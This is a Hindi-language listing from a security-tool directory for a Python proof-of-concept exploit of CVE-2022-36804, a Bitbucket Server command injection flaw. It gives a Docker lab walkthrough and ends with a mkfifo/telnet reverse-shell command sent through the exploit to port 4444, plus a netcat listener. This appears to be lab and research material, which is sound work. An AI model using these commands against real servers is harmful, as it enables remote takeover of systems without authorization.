Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-36804 — CVE-2022-36804 के लिए Python-आधारित प्रमाण-अवधारणा शोषण, Atlassian Bitbucket Server और Data Center में एक कमांड इंजेक्शन कमजोरी, जो दुर्भावनापूर्ण HTTP अनुरोधों के माध्यम से दूरस्थ कोड निष्पादन को सक्षम बनाती है। | Kitploit
उपकरण/GitHubGitHub/asepsaepdin/cve-2022-36804
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा
GitHubasepsaepdin/cve-2022-36804

CVE-2022-36804

CVE-2022-36804 के लिए Python-आधारित प्रमाण-अवधारणा शोषण, Atlassian Bitbucket Server और Data Center में एक कमांड इंजेक्शन कमजोरी, जो दुर्भावनापूर्ण HTTP अनुरोधों के माध्यम से दूरस्थ कोड निष्पादन को सक्षम बनाती है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-36804 - एटलैसियन बिटबकेट सर्वर और डेटा सेंटर कमांड इंजेक्शन भेद्यता

Python


⚠️ केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए

मूल शोषण लेखक

मूल PoC लेखक Walnut Security Services Pvt. Ltd के प्रति अत्यंत आभारी हैं

विवरण

Atlassian Bitbucket Server और Data Center 7.0.0 (संस्करण 7.6.17 से पहले), 7.7.0 से 7.17.10 से पहले, 7.18.0 से 7.21.4 से पहले, 8.0.0 से 8.0.3 से पहले, 8.1.0 से 8.1.3 से पहले, 8.2.0 से 8.2.2 से पहले, और 8.3.0 से 8.3.1 से पहले के संस्करणों में कई API एंडपॉइंट, सार्वजनिक या निजी बिटबकेट रिपॉजिटरी पर पढ़ने की अनुमति वाले दूरस्थ हमलावरों को एक दुर्भावनापूर्ण HTTP अनुरोध भेजकर मनमाना कोड निष्पादित करने की अनुमति देते हैं। यह भेद्यता हमारे बग बाउंटी प्रोग्राम के माध्यम से TheGrandPew द्वारा रिपोर्ट की गई थी।


चरण मार्गदर्शिकाएँ

  1. पहले, रिपॉजिटरी को क्लोन करें

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2022-36804.git
    
  2. निर्देशिका बदलें

    root@kitploit:~
    cd CVE-2022-36804
    
  3. भेद्य कंटेनर बनाएँ

    root@kitploit:~
    docker build -t CVE-2022-36804 .
    
  4. अस्थायी कंटेनर चलाएँ

    root@kitploit:~
    docker run --rm -it --name CVE-2022-36804 CVE-2022-36804
    
  5. कंटेनर का आईपी पता जांचें

    root@kitploit:~
    docker inspect CVE-2022-36804 | grep "IPAddress"
    
  6. एटलैसियन बिटबकेट सेट अप करें और URL खोलकर नया सार्वजनिक रिपॉजिटरी बनाएँ: http://172.17.0.3:7990

  7. रिमोट कोड एक्ज़ीक्यूशन (RCE) की जाँच करें

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.3:7990
    
  8. अनुकूलित कमांड (cmd) के साथ RCE की जाँच करें

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
    
  9. एक हमलावर के दृष्टिकोण से, इंटरैक्टिव शेल तक पहुँच प्राप्त करने के लिए रिमोट कोड निष्पादन महत्वपूर्ण है। इसलिए, निम्नलिखित कमांड को निष्पादित करने से bash पर आधारित tcp पर एक telnet रिवर्स शेल हमलावर के सिस्टम पर पोर्ट 4444/tcp पर ट्रिगर होगा:


क्रेडिट्स

  • https://github.com/walnutsecurity/cve-2022-36804
  • https://nvd.nist.gov/vuln/detail/cve-2022-36804
टूल डाउनलोड करें
root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c 'TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.1 4444 0<$TF | sh 1>$TF'
root@kitploit:~
nc -nlvp 4444